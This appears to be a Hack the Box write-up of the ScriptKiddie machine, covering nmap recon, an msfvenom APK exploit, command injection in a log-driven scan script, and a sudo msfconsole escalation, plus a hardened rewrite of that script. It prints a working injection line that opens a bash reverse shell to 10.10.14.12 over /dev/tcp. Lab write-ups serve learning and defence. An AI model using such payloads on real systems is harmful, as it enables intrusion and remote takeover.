Hack the Box: ScriptKiddie


ScriptKiddie was an easy Hack the Box machine. The main theme of the challenge was hacking an inexperienced hacker with their own tools (hence ScriptKiddie). I’ll exploit a vulnerability in msfvenom to gain a local shell. Then I’ll escalate privileges to another user by exploiting a command injection in a local script. In the end I’ll get a root shell by running the Metasploit console through sudo.

User

Nmap scan reveals a HTTP server on port 5000:

$ nmap scriptkiddie.htb -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-21 16:19 CET
Nmap scan report for scriptkiddie.htb (10.10.10.226)
Host is up (0.042s latency).
Other addresses for scriptkiddie.htb (not scanned): 10.10.10.226
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The webpage is an interface to 3 “hacking” tools: nmap, msfvenom, and searchsploit.

Ironically, I can use searchsploit to find a vulnerability in msfvenom itself:

Using Metasploit I’ll generate an APK file that returns a shell:

Uploading the generated file to the site’s msfvenom form spawns a shell:

Using that shell I can grab the user flag:

Root

In the /home/pwn/ folder there’s a script that runs nmap scans on “hackers” that appear in the /home/kid/logs/hackers file.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

As the kid user I control the hackers file. Everything after the second space on each line is taken as the "ip" and pasted unquoted into a sh -c string, so the nmap call is vulnerable to command injection. The following payload should return a reverse shell:

echo "a a ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.12/444 0>&1' #" > /home/kid/logs/hackers
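For comparison, here is a hardened rewrite of the scan script, added as an example (it is not the box's file): each target is validated as a dotted-quad IPv4 address before use, nmap is invoked with an argument list instead of through sh -c, and rejected entries are logged to stderr. The log format "[date time] target", the SCANNER override variable and the sample log contents are assumptions.

```shell
#!/bin/sh
# Hardened rewrite of the /home/pwn scan script (added example, not the box's file).
# Fixes the injection: a target reaches nmap only after it is validated as a
# dotted-quad IPv4, and nmap is invoked with an argument list, never via sh -c.
# Scanner binary; overridable (e.g. to a stub) so the logic can be tested without nmap.
SCANNER=${SCANNER:-nmap}

# is_ipv4 ADDR: succeed only if ADDR is exactly four decimal octets in 0..255.
# The body is a subshell, so set -f / IFS changes stay local and exit only ends the check.
is_ipv4() (
    set -f                       # never glob-expand the untrusted value
    IFS=.
    set -- $1                    # split on dots into positional parameters
    [ $# -eq 4 ] || exit 1
    for octet in "$@"; do
        case $octet in ''|*[!0-9]*) exit 1 ;; esac
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || exit 1
    done
    exit 0
)

# valid_targets LOG: print the unique, validated targets from LOG, one per line.
# Like the original, the target is everything after the second space.
valid_targets() {
    cut -d' ' -f3- "$1" | sort -u | while IFS= read -r target; do
        if is_ipv4 "$target"; then
            printf '%s\n' "$target"
        else
            printf 'rejected non-IP target: %s\n' "$target" >&2   # worth alerting on
        fi
    done
}

# scan_log LOG OUTDIR: scan each validated target, then truncate LOG as the original
# did. argv goes straight to the scanner binary, so no shell ever parses the log.
scan_log() {
    mkdir -p "$2"
    valid_targets "$1" | while IFS= read -r target; do
        "$SCANNER" --top-ports 10 -oN "$2/$target.nmap" "$target" >/dev/null 2>&1
    done
    : > "$1"
}

# write_sample_log PATH: constructed input: two real hits, one injection attempt, one bad octet.
write_sample_log() {
    printf '%s\n' '[2021-02-21 16:19:12] 10.10.14.12' \
                  '[2021-02-21 16:21:44] 10.10.14.12' \
                  '[2021-02-21 16:23:05] a ;id #' \
                  '[2021-02-21 16:25:30] 256.1.1.1' > "$1"
}
```

Run `write_sample_log /tmp/hackers && scan_log /tmp/hackers /tmp/recon` to see only 10.10.14.12 scanned and the other two lines reported on stderr.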

The pwn user can run msfconsole through sudo without a password:

The Metasploit console can be used to spawn a shell and grab the root flag:

Tellico Lungrevink